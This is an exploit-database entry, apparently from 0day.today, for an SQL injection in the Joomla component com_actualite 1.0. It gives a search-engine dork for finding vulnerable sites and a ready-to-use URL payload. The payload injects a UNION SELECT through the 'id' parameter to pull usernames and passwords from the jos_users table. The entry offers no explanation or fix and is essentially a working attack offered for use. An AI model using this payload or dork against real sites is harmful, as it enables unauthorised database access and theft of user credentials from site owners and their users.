id: 2797
date: 03/31/2008
title: Joomla Component actualite 1.0 (id) SQL Injection Vulnerability
author: Stack
cves: 

===============================================================
Joomla Component actualite 1.0 (id) SQL Injection Vulnerability
===============================================================



##########################################
#
# Joomla Component com_actualite SQL Injection
#
###########################################
#
# DORK 1 : allinurl: "com_actualite"
#
###########################################
EXPLOiT :

index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),password),3,4,5,6,7,8,9%20from%20jos_users/*

###########################################



#  0day.today [2023-03-25]  #